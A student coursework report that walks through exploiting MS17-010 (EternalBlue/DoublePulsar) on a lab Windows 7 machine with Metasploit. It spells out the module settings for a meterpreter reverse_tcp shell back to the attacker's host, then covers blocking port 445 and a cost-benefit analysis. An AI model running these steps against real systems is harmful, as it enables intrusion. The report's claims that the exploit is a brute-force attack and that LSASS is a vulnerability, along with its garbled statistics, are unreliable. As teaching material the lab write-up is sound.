CC5004NI Security in Computing

Module Code & Module Title

CC5004NI Security in Computing

Assessment Weightage & Type

30% Individual Coursework 02

Year and Semester

2021 -22 Spring Semester

Student Name: Rewanta Adhikari

London Met ID: 20049258

College ID: NP01NT4S210055

Assignment Due Date: 5th May 2022
Assignment Submission Date: 5th May 2022
Word Count (Where required): 4135

I confirm that I understand my coursework needs to be submitted online via Google Classroom under the relevant
module page before the deadline for my assignment to be accepted and marked. I am fully aware that late
submissions will be treated as non-submission and a mark of zero will be awarded.
CC5004NI Security in Computing

Acknowledgement
I had to enlist the assistance and counsel of a few well-respected individuals to
complete the goals of this study, and they deserve my heartfelt appreciation.
First and foremost, I'd want to express my gratitude to Islington College and London
Metropolitan University for offering a conducive learning atmosphere and course
materials.
Mr. Akchayat Bikram Dhoj Joshi, my module leader and Suruchi Shrestha, my tutor
deserves special thanks for his advice and continual monitoring, as well as his help in
finishing this homework.
I'd want to thank my parents for their unwavering support, collaboration, and
encouragement.
My gratitude and thanks also go to my friends who have volunteered to assist me with
their skills.
CC5004NI Security in Computing

Abstract
In this document, we show how to use a brute force assault to circumvent a system's
login credentials and get remote access to it. The presented attack uses Kali Linux as
the attacker computer, process "lsass.exe" as the process to inject, and meterpreter
reverse TCP as the needed payload to exploit the MS17_010 vulnerability of the SMB
port of Windows 7-64 bit. The easiest method for hacking into any system and doing
harmful operations is to use a brute force assault. As a result, steps should be taken to
prevent the CIA trio from compromising the organization's data. Along with the
demonstration of the attack, mitigation measures are discussed, as well as tips for
avoiding such assaults. One of the most successful mitigation measures is to block TCP
port 445 through the Windows firewall, and the processes are well described. This
mitigation technique is also evaluated, along with its benefits, drawbacks, and cost-
benefit analysis. This paper demonstrates how to compromise a system using Kali
Linux's numerous tools and tactics, as well as how to avoid it.
CC5004NI Security in Computing

Table of Contents
1) Introduction .............................................................................................................. 1

1.1 Current Scenario ................................................................................................ 2

1.2 Problem Statement ............................................................................................ 4

1.3 Aims and Objectives .......................................................................................... 5

2) Background .............................................................................................................. 6

2.1 Brute Force Attack ................................................................................................. 6

2.2 Server Message Block (SMB) Protocol .................................................................. 6

2.3 Eternal Blue ........................................................................................................... 7

2.4 DoublePulsar ......................................................................................................... 8

2.5 Pre-requirements and Tools .................................................................................. 9

2.6 Methodologies ..................................................................................................... 10

3) Demonstration ........................................................................................................ 11

3.1 Inserting Attacker’s machine in Network .............................................................. 11

3.2 Scanning Targeted Host’s ports........................................................................... 12

3.3 Searching for Module “MS17_010” ...................................................................... 12

3.4 Checking Likelihood of Vulnerability in Targeted Host ......................................... 13

3.5 Exploitation of MS17_010 Vulnerability ............................................................... 14

a) set PROCESSINJECT Isass.exe ....................................................................... 15

b) set PAYLOAD windows/x64/meterpreter/reverse_tcp ........................................ 15

c) set RHOST 10.10.10.15 ..................................................................................... 15

d) set LHOST 10.10.10.254 ................................................................................... 15

e) set TARGETARCHITECTURE x64 .................................................................... 15

4) Mitigation................................................................................................................ 18

4.1 Updating Microsoft’s Security or Windows Defender ........................................... 18

CC5004NI Security in Computing

4.2 Use of Long and Strong Passwords .................................................................... 18

4.3 Block SMBv1 Port ................................................................................................ 18

4.3.1 Process of Blocking SMBv1 Port ...................................................................... 18

4.3.2 Try to Exploit SMB of Windows Again after Mitigation ...................................... 23

i. Check Likelihood of Vulnerability in Targeted Host .......................................... 24

ii. Try to Compromise the Target ......................................................................... 24

5) Evaluation .............................................................................................................. 25

5.1 Pros of blocking port 445 ..................................................................................... 25

5.2 Cons of blocking port 445 .................................................................................... 25

5.3 Cost Benefit Analysis ........................................................................................... 25

6) Conclusion ............................................................................................................. 27

7) References............................................................................................................. 28

8) Appendix ................................................................................................................ 30
CC5004NI Security in Computing

Table of Figures
Figure 1: Brute Force Attack .......................................................................................................1
Figure 2: Brute-Force attack stats (Hanna, 2022)........................................................................2
Figure 3: Brute-force computing time for password cracking (Cloudflare, 2022) ..........................3
Figure 4: New security modes in Windows by Microsoft (Weston, 2022) ....................................4
Figure 5: Working of SMB Protocol (Sheldon, 2022) ...................................................................7
Figure 6: EternalBlue ..................................................................................................................8
Figure 7: Inserting Attacker's machine in Network .....................................................................11
Figure 8: Scanning Targeted Host's ports .................................................................................12
Figure 9: Executing Metasploit Console in Kali Linux ................................................................12
Figure 10: Searching for module "smb login".............................................................................13
Figure 11: Using a module to Check .........................................................................................13
Figure 12: Command for module to check.................................................................................13
Figure 13: Checking likelihood of Vulnerability in targeted host .................................................14
Figure 14: Using a module for Exploitation ................................................................................14
Figure 15: Showing Options of Exploitation Module ..................................................................14
Figure 16: Setting Required Parameters ...................................................................................15
Figure 17: Exploit Successful ....................................................................................................16
Figure 18: Running "sysinfo" command.....................................................................................16
Figure 19: Running "getuid" command ......................................................................................17
Figure 20: Checking status of TCP port 445 ..............................................................................18
Figure 21: Opening Windows Firewall .......................................................................................19
Figure 22: Advanced Settings Criteria in Windows Firewall .......................................................20
Figure 23: Inbound Rules > New Rule .......................................................................................20
Figure 24: Entering 445 on Specific Local Port Option ..............................................................21
Figure 25: Choosing Port option ................................................................................................21
Figure 26: Block the connection > Next .....................................................................................22
Figure 27: Ticking all Checkboxes of Profile ..............................................................................22
Figure 28: Checking New Rule ..................................................................................................23
Figure 29: Checking the Likelihood of Vulnerability in Targeted Host ........................................24
Figure 30: Failure to Exploitation ...............................................................................................24
CC5004NI Security in Computing

1) Introduction

A brute-force attack a trial-and-error approach to decode login credentials and

encryption keys to use them to gain unauthorized access to systems. Rather than
applying cerebral techniques, using brute force is an exhausting task. A basic brute-
force assault often uses automated techniques to guess all potential passwords until the
correct input is discovered. For breaking popular passwords, this is an old but still
efficient attack technique.

Figure 1: Brute Force Attack

Different types of brute-force attacks exist, such as the following:

• Credential stuffing: Credential stuffing happens when a user account is hacked, and
the attacker attempts the username and password combination on many platforms.
• Reverse brute-force attack: To get network and data access, a reverse brute-force
assault begins with the attacker using a common password – or already knowing a
password – against several usernames or encrypted files. To locate the proper
username, the hacker will apply the same method as a standard brute-force assault.

1
Rewanta Adhikari
CC5004NI Security in Computing

• Dictionary attack: Another sort of brute-force assault is a dictionary attack, in which

all words in a dictionary are examined to determine a password. To crack lengthier
passwords, attackers might supplement words with numbers, letters, and other
elements. (Hanna, 2022)

1.1 Current Scenario

The main benefit of brute force attacks is that they are relatively simple to execute and,
given enough time and the target's lack of a mitigation technique, they always work. A
brute force assault may be used to hack any password-based system or encryption key.
The length of time it takes to brute force into a system is a helpful statistic for
determining the security of that system. A properly randomized password might take a
brute force attacker day, months, or even years to decrypt if the target string is
sufficiently large. Brute force assaults have become much more difficult because of the
current trend of needing larger passwords and encryption keys. When good passwords
and encryption are used, attackers usually resort to alternative techniques of code
breaking, such as social engineering or on-path assaults.

Figure 2: Brute-Force attack stats (Hanna, 2022)

2
Rewanta Adhikari
 CC5004NI Security in Computing

They function because it is the simplest way with ample time and a lack of mitigating
methods. According to data, the number of sites hacked each day nearly doubled in
2016. In recent years, there has been a steady growth in Brute Force Attacks. Hacking
in 2017, attempts to use brute force or dictionary attacks increased 400%. In 2021,
attempts to use brute force has been decreasing by 200% as there are now different
form of attacks.

Figure 3: Brute-force computing time for password cracking (Cloudflare, 2022)

3
Rewanta Adhikari
CC5004NI Security in Computing

1.2 Problem Statement

Attacks such as ransomware can spread through Windows' SMB (Server Message
Block) vulnerability and obtain access to the machine. To avoid such attack, Microsoft
released a patch in March 2017. Though the patch was released, still many individuals
and organizations have not applied it yet. SMB exploit has been an effective threat
vector that may be exploited in visible ransomware outbreaks and complex Trojan
assaults because of these unpatched computers and people. By 2021, the protections
built into Windows, Azure, Microsoft 365, and Microsoft Defender for Office 365 will
have prevented more than 9.6 billion malware threats, 35.7 billion phishing and other
malicious emails, and 25.6 billion attempts to hijack our enterprise customers by brute-
forcing stolen passwords—more than 800 password attacks per second. The
intelligence we gain from this, along with the 8,500 security specialists we employ and
the 24 trillion security signals processed by our cloud every 24 hours, provides us with a
unique perspective on what our clients require to defend themselves from attacks both
now and in the future. (Weston, 2022)

Figure 4: New security modes in Windows by Microsoft (Weston, 2022)

4
Rewanta Adhikari
CC5004NI Security in Computing

1.3 Aims and Objectives

The aim of this report is to demonstrate a simple example of brute force attack, describe
the process and critically analyse its mitigation strategies.

Objectives applied to achieve the given aims are mentioned below:

• To identify the current circumstances of a brute-force attack.

• To conduct a background study detailly.
• To demonstrate the attack and its mitigation practically.
• To critically evaluate selected mitigation strategy with its pros, cons and CBA
(Cost Benefit Analysis).

5
Rewanta Adhikari
CC5004NI Security in Computing

2) Background

In today's world, technological advancement has progressed to the point where

password-protected systems have become an essential component of daily life.
However, password cracking may be accomplished in a variety of methods. Password
cracking is the technique of retrieving a password from data stored or communicated by
a system. It has both good and bad characteristics. A hacker may crack passwords for a
variety of reasons, including gaining unauthorized access to someone's account or
system, recovering a forgotten password, or exploiting any system's or enterprise's
security to obtain confidential information. Various strategies and procedures, such as
phishing, rainbow table attack, dictionary attack, brute force assault, and so on, can be
used for this process. A third party can use one of these ways. (Williams, 2022)

2.1 Brute Force Attack

A brute force attack is a type of hacking technique that relies on trial and error to crack
passwords, login credentials, and encryption keys. It is a simple yet dependable method
for getting illegal access to individual accounts as well as systems and networks of
companies. The hacker attempts a variety of usernames and passwords, frequently
using a computer to try many combinations, until they uncover the proper login
credentials. The term "brute force" refers to attackers who employ excessive force to
obtain access to user accounts. Despite being an ancient cyberattack strategy, brute
force assaults have been tried and proven and are still a common hacking tactic.
(Fortinet, 2022)

2.2 Server Message Block (SMB) Protocol

The Server Message Block protocol (SMB protocol) is a client-server communication

protocol that is used to share access to network resources like as files, printers, serial
ports, and other resources. Transaction protocols for interposes communication can
also be carried. SMB has mostly been used to link Windows machines over the years,
while most other systems, such as Linux and macOS, also provide client components
for connecting to SMB resources.

6
Rewanta Adhikari
CC5004NI Security in Computing

Since Windows 95, Microsoft Windows operating systems (OSes) have incorporated
client and server SMB protocol capabilities. SMB functionality is also incorporated into
the Linux and macOS operating systems. Furthermore, Samba may be used on Unix-
based computers to simplify SMB access to file and print services. (Sheldon, 2022)

Figure 5: Working of SMB Protocol (Sheldon, 2022)

More information about SMB Protocol is in Appendix, Click the link: Appendix

2.3 Eternal Blue

The US National Security Agency (NSA) developed EternalBlue, a Windows

vulnerability that was utilized in the 2017 WannaCry ransomware outbreak. EternalBlue
takes use of a flaw in Microsoft's implementation of the Server Message Block (SMB)
Protocol. This tricks a Windows PC that hasn't been patched against the vulnerability
into permitting unauthorized data packets into the legitimate network. These data
packets may include malware such as a trojan, ransomware, or other potentially harmful
application. EternalBlue was among the details revealed by the Shadow Brokers, a
hacker gang that accessed an NSA cache of cyber weapons in 2017. EternalBlue was
put on the internet by Shadow Brokers, causing confusion and embarrassment for the

7
Rewanta Adhikari
CC5004NI Security in Computing

NSA. Microsoft was notified and responded quickly by distributing a security fix for
Windows sysadmins. Those whose computers were unpatched or who were running
earlier versions of Windows were vulnerable to assaults. At the time, the most popular
Windows versions were 7 and 10, however several major organizations continued to
use Windows XP. Microsoft had previously provided a fix for Windows 7 and 10 during
the WannaCry outbreak, which happened mere weeks after the exposure of NSA hack
content. The business then issued a fix for Windows XP, which was previously
unsupported. (HYPR, 2022)

Figure 6: EternalBlue

2.4 DoublePulsar

DoublePulsar is a backdoor tool that is installed on a target system and has the
capability of injecting and running malicious malware on the machine. This allows an
actor to escalate the assault by injecting any malicious code of their choice, ending in a
total breach. The assault is exceedingly covert, with system administrators unlikely to
discover the incursion unless the attackers make a mistake. As a result, many infected

8
Rewanta Adhikari
CC5004NI Security in Computing

computers are likely to stay infected for some time before the intrusion is detected.
(NHS Digital, 2022)

2.5 Pre-requirements and Tools

To accomplish this attack, varieties of tools of Kali Linux was used such as Metasploit
and Nmap. For the victim machine, Windows 7 was chosen.

• VMware Workstation Pro: VMware is a virtualization and cloud computing

software company headquartered in Palo Alto, California. VMware, which was
founded in 1998, is a subsidiary of Dell Technologies. VMware was bought by
EMC Corporation in 2004; EMC was eventually acquired by Dell Technologies in
2016. VMware's virtualization solutions are built upon its bare-metal hypervisor
ESX/ESXi in x86 architecture. (Bastiaansen, 2022) It was used to run required
virtual machines i.e., Kali Linux (Attacker) and Windows 7 PC (Victim).
• GNS3: Hundreds of thousands of network engineers throughout the world use
GNS3 to mimic, setup, test, and debug virtual and real networks. GNS3 enables
you to operate topologies ranging from a few devices on your laptop to numerous
devices hosted on several servers or even in the cloud. GNS3 is free and open-
source software (GNS3, 2022). GNS3 (Graphic Network Simulator-3) version
2.2.5 was used to create a LAN network topology using Cisco c3725 router and
Ethernet Switch. This tool allows us to build virtualized network laboratories with
variety of router, switches, and PCs.
• Kali Linux: Kali Linux is a customized Linux distribution for cybersecurity. It is an
open-source tool that allows for extensive customization for penetration testing,
allowing businesses to better understand their vulnerabilities. While many
experts recommend against Kali Linux for beginners, those who are interested in
cybersecurity often benefit from using this specific Linux distribution (Techopedia,
2022). Kali Linux is used as an attacker machine to execute an attack to exploit
SMB vulnerability of Windows 7 64-bit through Eternalblue.
• Nmap: Nmap (Network Mapper) is a free and open-source Snetwork discovery
and security auditing software. Many system and network administrators use it
for activities like network inventory, service upgrade schedule management, and

9
Rewanta Adhikari
CC5004NI Security in Computing

monitoring host or service uptime. Nmap employs new techniques to detect what
hosts are available on the network, what services (application name and version)
those hosts provide, what operating systems (and OS versions) they are running,
what sort of packet filters/firewalls are in use, and hundreds of other
characteristics. (NMAP, 2022)
• Metasploit: The Metasploit Framework is an open-source, Ruby-based
framework used by information security experts and cybercriminals to locate,
exploit, and evaluate system vulnerabilities. H.D Moore created Metasploit in
2003 as a Perl-based portable network utility as part of the Metasploit Project.
The framework was completely redone in Ruby in 2007. The framework includes
a few exploitation and penetration testing tools. (Chipeta, 2022)

2.6 Methodologies

Firstly, Kali Linux (attacking machine) and Windows 7 (victim machine) was set into a
local network. Ping command was then used to check successful connection between
the devices. Metasploit console was executed, and a search was made for available
module having MS18_101 or SMB vulnerabilities. A list of modules is provided, with the
"auxiliary/scanner/smb/smb ms17 010" module being required to scan for and validate
the presence of an SMB vulnerability on the targeted computer. To see what input is to
be supplied, we execute the command "display options." We run it with the IP address
of the targeted host as RHOSTS to test if it is susceptible.

If the user is vulnerable to the attack, a positive message is sent, and following this
verification, another module, "exploit/windows/smb/eternalblue doublepulsar," is utilized
for exploitation. Again, "show choices" displays the input to be provided. We assigned
the victim's IP address as RHOST, the listening host's IP address as LHOST, x64 as
the target architecture, and windows/x64/meterpreter/reverse TCP as the payload.
We're ready to go now that we've completed the setup exploit. After we type the
command "run" to exploit, a Meterpreter session is generated in a few seconds,
granting us remote access to the targeted system.

10
Rewanta Adhikari
CC5004NI Security in Computing

3) Demonstration

This report demonstrates the use of Eternalblue and DoublePulsar to hack Windows 7
machine through Metasploit in Kali Linux machine. Following steps were takes:

3.1 Inserting Attacker’s machine in Network

Figure 7: Inserting Attacker's machine in Network

To begin, the attacker system, Kali Linux, was placed in the network topology alongside
the targeted host, Windows 7, using Router and Core Switch. The IP address of
Windows 7-64 bit is 10.10.10.15/24, as shown in the picture, while the IP address of
Kali Linux is 10.10.10.254/24.

11
Rewanta Adhikari
CC5004NI Security in Computing

3.2 Scanning Targeted Host’s ports

SMB protocol operates as an application-layer network protocol on port 445, largely

used for providing shared access to serial ports, files, and other network assets.
Because we want to attack the port 445 vulnerability, Nmap was used to determine
whether the needed port of the targeted host is open or not.

Figure 8: Scanning Targeted Host's ports

3.3 Searching for Module “MS17_010”

Figure 9: Executing Metasploit Console in Kali Linux

As indicated in the illustration, the command "msfconsole" was first entered into the
terminal of the Kali Linux machine. This command launches Metasploit console from the
"/usr/share/metasploitframework/msfconsole" directory, bypassing the start-up banner.

12
Rewanta Adhikari
CC5004NI Security in Computing

Following the execution of MSF console, a search for the string "smb login" was
performed, as shown in the preceding image. This search returns a list of all modules
that include the string "smb login," along with their name and description.

Figure 10: Searching for module "smb login"

3.4 Checking Likelihood of Vulnerability in Targeted Host

Figure 11: Using a module to Check

Using the "auxiliary/scanner/smb/smb_17_010" module to determine whether the

targeted host is vulnerable. The command "show options" was then typed to display the
choices and their information, as seen in the picture above.

Figure 12: Command for module to check

Using the "auxiliary/scanner/smb/smb 17 010" module to determine whether the

targeted host is vulnerable. The command "show options" was then typed to display the
choices and their information, as seen in the picture above.

13
Rewanta Adhikari
CC5004NI Security in Computing

Figure 13: Checking likelihood of Vulnerability in targeted host

RHOSTS criteria were defined with the IP address of the targeted host, as indicated in
the figure. "Set RHOSTS IP address>" is the syntax. Because the IP address of the
targeted host, Windows 7, is 10.10.10.15, the command to enter was "set
RHOSTS 10.10.10.15”.

Then, we hit “run” command to execute the program. After execution, we can see that
Windows 7 Home Premium 7601 Service Pack 1 x64 (64-bit) is likely vulnerable to
MS17_010.

3.5 Exploitation of MS17_010 Vulnerability

Figure 14: Using a module for Exploitation

After confirming potential of exploitation, the module "exploit/windows/smb/eternalblue

doublepulsar" was employed. This module is used to attack the MS17_010 vulnerability
in Windows 7-64 bit and install a persistent backdoor.

Figure 15: Showing Options of Exploitation Module

14
Rewanta Adhikari
CC5004NI Security in Computing

Following our entry into the exploit module, the "show options" command was
introduced, which shows options together with their available information, as seen in the
picture above. The PROCESSINJECT option was set to "explore.exe."

Figure 16: Setting Required Parameters

As shown in above figure, different parameters were set:

a) set PROCESSINJECT Isass.exe

This command specifies the "lsass.exe" (Local Security Authority Subsystem Service)
process into which the payload will be injected. LSASS is a vulnerability in Windows
operating systems that allows us to remotely execute the "lsass.exe" process with no
user intervention.

b) set PAYLOAD windows/x64/meterpreter/reverse_tcp

This command selects the Meterpreter reverse_tcp as the payload.

c) set RHOST 10.10.10.15

This command sets the IP address of target host.

d) set LHOST 10.10.10.254

This command sets the IP address of listening host.

e) set TARGETARCHITECTURE x64

This command sets x64 architecture for the target host. It is set as x86 in default.

15
Rewanta Adhikari
CC5004NI Security in Computing

Figure 17: Exploit Successful

After setting all the parameters, “exploit” command was inserted which executes the
process of exploitation. In the above figure, we can see that MS17_010 vulnerability of
Windows OS was successfully exploited and meterpreter session 1 is opened. This
illustrates a successful control over the system.

Figure 18: Running "sysinfo" command

Following the setup of a session, several instructions can be input to compromise the
system.

16
Rewanta Adhikari
CC5004NI Security in Computing

The command "sysinfo" revealed system information in this case, as seen in the image
above. Furthermore, the number of logged in users is two, indicating an existing
legitimate user and the attacker.

Figure 19: Running "getuid" command

The Meterpreter user on the target was displayed using the command "getuid."
Similarly, on the infected target, other commands may be used to inject malware,
launch new programs, stop running processes, access all data, and so on. The
command "ps" is used to view the target's processes.

This illustrated the confirmation of attack.

17
Rewanta Adhikari
CC5004NI Security in Computing

4) Mitigation

4.1 Updating Microsoft’s Security or Windows Defender

As previously stated, Microsoft has provided the MS17_010 patch to prevent such
attacks. As a result, installing this remedy as well as any available updates published by
Microsoft in March 2017 can prevent the exploitation of the MS17_0101 vulnerability.
Also on new Windows 11, different security algorithms are used for the protection and
also most of the vulnerability and loopholes are closed.

4.2 Use of Long and Strong Passwords

We can use the long and complex password including letter both lower and uppercase,
symbols, numbers, special characters and so on. Also, enforce periodical password
change.

4.3 Block SMBv1 Port

Most data in SMB are sent over TCP port 445, therefore leaving this port open exposes
Windows OS. As a result, limiting TCP port 445 may be the most effective solution to
mitigate SMB vulnerability and prevent remote code execution.

4.3.1 Process of Blocking SMBv1 Port

Following steps were taken for the blocking of SMBv1 Port:

i. Check the status of port 445.

Figure 20: Checking status of TCP port 445

18
Rewanta Adhikari
CC5004NI Security in Computing

Port 445 is usually opened by the system on Windows, but it is important to check it on
the host. We did this by typing "netstat -na" into the target machine's command line.
From the figure above, the command displayed ports of the machine along with their
status. One line 2, we can see the status of port 45 and the status shows it is
“LISTENING”. This indicates that the TCP port is not blocked.

ii. Go to Start > Control Panel > Windows Firewall and then Advanced settings.

Figure 21: Opening Windows Firewall

After confirming that TCP port 445 was open, the Windows OS control panel was
launched, and System and Security was selected. We selected Windows Firewall from
the "System and Security" menu.

19
Rewanta Adhikari
CC5004NI Security in Computing

Figure 22: Advanced Settings Criteria in Windows Firewall

As indicated in the figure above, the option "Advanced settings" was selected inside the
Windows Firewall Section. Before we begin, we must ensure that the Windows firewall
is enabled.

iii. Click Inbound Rules > New rule, choosing Port > Next > TCP > Specific local
ports on pop-up window and type 445 and press Next Button.

Figure 23: Inbound Rules > New Rule

20
Rewanta Adhikari
CC5004NI Security in Computing

Figure 25: Choosing Port option

Within the "Advanced Settings" section, "Inbound Rules" was selected, followed by
"New Rule." A new rule will be generated to restrict receiving packets on TCP port 445.
So, we selected on port, and under "particular local ports," we specified the port to
which connections should be restricted.

Figure 24: Entering 445 on Specific Local Port Option

21
Rewanta Adhikari
CC5004NI Security in Computing

iv. Click Block the connection > Next and tick all the check boxes and press on
Next.

Figure 26: Block the connection > Next

Then, “block the connection” radio button was selected. This option would block the
connection of port we mentioned earlier. Next button was clicked was shown in figure

Figure 27: Ticking all Checkboxes of Profile

22
Rewanta Adhikari
CC5004NI Security in Computing

Then, as seen in the image, three profiles were shown in checkboxes. All of these
profiles were chosen since the port must be close at all times. The next button was
pressed. Following that, the description and name of the new rule were requested. The
term for this was "Blocking port 445", and a brief explanation of why this was done was
provided.

v. Check if the rule is created by Properties > Protocols and Ports > Local Port.

Figure 28: Checking New Rule

Following all these procedures, a new rule entitled "Blocking port 445" was discovered
inside "Inbound Rules." The rule was tested once again by inspecting its characteristics.
This was the final step in the process of blocking TCP port 445.

4.3.2 Try to Exploit SMB of Windows Again after Mitigation

After applying the given mitigation technique, the process to exploiting MS17_010
vulnerability of SMB protocol of Windows was again carried out to check if the mitigation
technique worked out or not.

Again, the steps for exploitation were followed:

23
Rewanta Adhikari
CC5004NI Security in Computing

i. Check Likelihood of Vulnerability in Targeted Host

Figure 29: Checking the Likelihood of Vulnerability in Targeted Host

Again, the "auxiliary/scanner/smb/smb 17 010" module was used to determine whether

the targeted host is susceptible. The target's IP address was then set to RHOSTS, and
the malware was executed. There was no assurance, as there had been previously, that
the target is likely susceptible.

ii. Try to Compromise the Target

When we attempted to infiltrate the target again, we received an error message

indicating a negative status of TCP port 445, indicating that the packets sent to port 445
were blocked by the firewall and the attack could not be effective. Finally, the mitigation
strategy we used on Windows OS was successful.

Figure 30: Failure to Exploitation

24
Rewanta Adhikari
CC5004NI Security in Computing

5) Evaluation

The Windows OS vulnerability MS17 010 may be readily exploited to get remote access
to it. This attack may be avoided by banning all TCP port 445 connections. Leaving this
port exposed exposes Windows OS to a variety of harmful actions such as trojans and
worms. However, blocking ports has both advantages and disadvantages.
5.1 Pros of blocking port 445

a. Windows OS can be prevented from trojan and worms.

b. Malware attacks like ransomware which uses TCP port 445 can be prevented.
c. It is the cheapest or if known zero cost mitigation approach.

5.2 Cons of blocking port 445

a. SMB based services such as printer sharing, remote access to Window

administration, access serial ports and different assets of the system, will not be
available.

5.3 Cost Benefit Analysis

To calculate the cost-benefit analysis, consider a corporation whose systems' SMB

vulnerability was exploited and, following its discovery, the same mitigation technique as
described in this report was implemented. After discovering that their system had been
remotely accessed by an unknown third party, the organization determined to establish
an effective mitigation approach. Their annual loss expectation as a result of this assault
was $310,000. To address this issue, IT personnel were employed. They discovered the
vulnerability in the company's Windows operating systems after doing vulnerability
analysis. To deploy the mitigation strategy, IT personnel built a new incoming rule in the
Windows firewall that would discard packets arriving at TCP port 445.

Now,

As we know,

Cost Benefit Analysis (CBA)= Annualized Loss Expectancy (Prior) – Annualized

Loss Expectancy (post) – Cost of mitigation

25
Rewanta Adhikari
CC5004NI Security in Computing

i.e.,

CBA = ALE (Prior) – ALE (Post) – ACS

= $310,000 -$180,000 -$500

= &129,500

Because the total of annualized loss expectancy before and after mitigation is larger
than the sum of annualized loss expectancy after and after mitigation, this technique is
a cost-effective countermeasure.

26
Rewanta Adhikari
CC5004NI Security in Computing

6) Conclusion

The paper successfully showed a brute force attack that bypasses the system's login
credentials and grants remote access to the target. This research focuses on the
MS17_010 SMB protocol vulnerability and its exploitation in Windows OS.

This vulnerability is exploited from a Kali Linux computer using Nmap and Metasploit
modules. Different settings must be specified for each module. This entire study
demonstrates how to circumvent authentication and acquire remote access with
Eternalblue. Furthermore, DoublePulsar is employed to plant a backdoor for
persistence. To mitigate the issue, a Windows fix for SMB vulnerability or simply a
firewall incoming rule to block traffic for TCP port 445 might be written.

To compile this study, extensive research was conducted, several websites were
visited, and journals were studied. Various failures were addressed for subsequent
attack procedures, which explained associated ideas.

This course was beneficial in learning various tools and strategies in Kali Linux that may
be utilized for ethical hacking. It improved the practical notion of scanning and exploiting
machine vulnerabilities. This report might be beneficial to students who wish to get
basic practical understanding about ethical hacking.

Brute force attacks are used to circumvent security measures and get access to the
desired data. While it may appear that only hackers may benefit from this, many
security organizations utilize brute force assaults to assist evaluate their clients'
systems.

Any time a system is subjected to an automated assault, whether online or offline, it

poses a serious risk since it is just a matter of time before it succeeds.
Countermeasures can at the very least slow down attackers.

27
Rewanta Adhikari
CC5004NI Security in Computing

7) References
Bastiaansen, R., 2022. VMware. [Online]
Available at: https://www.techtarget.com/searchvmware/definition/VMware
[Accessed 04 May 2022].
Chipeta, C., 2022. UpGuard. [Online]
Available at: https://www.upguard.com/blog/metasploit
[Accessed 04 May 2022].
Cloudflare, 2022. Bruteforce. [Online]
Available at: https://www.cloudflare.com/learning/bots/brute-force-attack/
[Accessed 03 May 2022].
Fortinet, 2022. What is a Brute Force Attack?. [Online]
Available at: https://www.fortinet.com/resources/cyberglossary/brute-force-attack
[Accessed 04 May 2022].
GNS3, 2022. Getting Started with GNS3. [Online]
Available at: https://docs.gns3.com/docs/
[Accessed 04 May 2022].
Hanna, K. T., 2022. Brute-force attack. [Online]
Available at: https://www.techtarget.com/searchsecurity/definition/brute-force-cracking
[Accessed 05 2022].
HYPR, 2022. eternalblue. [Online]
Available at: https://www.hypr.com/eternalblue/
[Accessed 04 May 2022].
NHS Digital, 2022. DoublePulsar Backdoor. [Online]
Available at: https://digital.nhs.uk/cyber-alerts/2017/cc-1354#summary
[Accessed 04 May 2022].
NMAP, 2022. Nmap: Discover your network. [Online]
Available at: https://nmap.org/
[Accessed 06 May 2022].
Sheldon, R., 2022. SMB Protocol. [Online]
Available at: https://www.techtarget.com/searchnetworking/definition/Server-Message-
Block-Protocol
[Accessed 04 May 2022].
Techopedia, 2022. Kali Linux. [Online]
Available at: https://www.techopedia.com/definition/32588/kali-linux
[Accessed 04 May 2022].
Weston, D., 2022. Microsoft Security. [Online]
Available at: https://www.microsoft.com/security/blog/2022/04/05/new-security-features-

28
Rewanta Adhikari
CC5004NI Security in Computing

for-windows-11-will-help-protect-hybrid-work/
[Accessed 03 May 2022].
Williams, L., 2022. Password Cracking. [Online]
Available at: https://www.guru99.com/how-to-crack-password-of-an-application.html
[Accessed 03 May 2022].

29
Rewanta Adhikari
CC5004NI Security in Computing

8) Appendix

Since the introduction of the SMB protocol, several SMB dialects have been produced,
each of which has improved on the original implementation by providing additional
features, scalability, security, and efficiency. Here's a rundown of the most significant
dialects:

• SMB 1.0 (1984): IBM developed SMB 1.0 for file sharing in DOS. It pioneered
opportunistic locking (Oplock) as a client-side caching approach aimed at
reducing network traffic. Microsoft's LAN Manager software will subsequently
integrate the SMB protocol.
• CIFS (1996): CIFS is a Microsoft-created SMB dialect that first appeared in
Windows 95. CIFS, which stands for Common Internet File System, adds support
for bigger file sizes, direct TCP/IP transmission, and symbolic and hard
connections.
• SMB 2.0 (2006): Windows Vista and Windows Server 2008 included SMB 2.0. It
improved performance by reducing chattiness, increasing scalability and
robustness, and adding support for wide area network (WAN) acceleration.
• SMB 2.1 (2010): SMB 2.1 was released alongside Windows Server 2008 R2 and
Windows 7. To increase caching and performance, the client Oplock leasing
model was used instead of Oplock. Other improvements added support for larger
maximum transmission units and increased energy economy, which allowed
clients with open files from an SMB server to enter sleep mode.
• SMB 3.0 (2012): SMB 3.0 was first introduced in Windows 8 and Windows
Server 2012. It included several substantial enhancements to increase
availability, performance, backup, security, and management. SMB Multichannel,
SMB Direct, transparent failover of client access, Remote Volume Shadow Copy
Service support, SMB Encryption, and other notable new features were added.
• SMB 3.02 (2014): Windows 8.1 and Windows Server 2012 R2 included SMB
3.02. It includes speed improvements and the ability to disable CIFS/SMB 1.0
support, as well as the removal of associated binaries.

30
Rewanta Adhikari
CC5004NI Security in Computing

• SMB 3.1.1 (2015): SMB 3.1.1 was made available alongside Windows 10 and
Windows Server 2016. Among other things, it included support for enhanced
encryption, pre-authentication integrity to avoid man-in-the-middle (MitM) attacks,
and cluster dialect fencing.

31
Rewanta Adhikari